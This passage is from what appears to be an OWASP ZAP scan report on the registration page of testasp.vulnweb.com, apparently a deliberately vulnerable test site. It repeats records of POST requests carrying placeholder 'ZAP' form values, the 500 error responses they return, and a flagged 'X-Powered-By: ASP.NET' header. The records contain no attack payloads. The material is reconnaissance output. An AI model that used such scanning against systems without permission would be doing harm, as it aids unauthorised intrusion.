tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 465 bytes. |
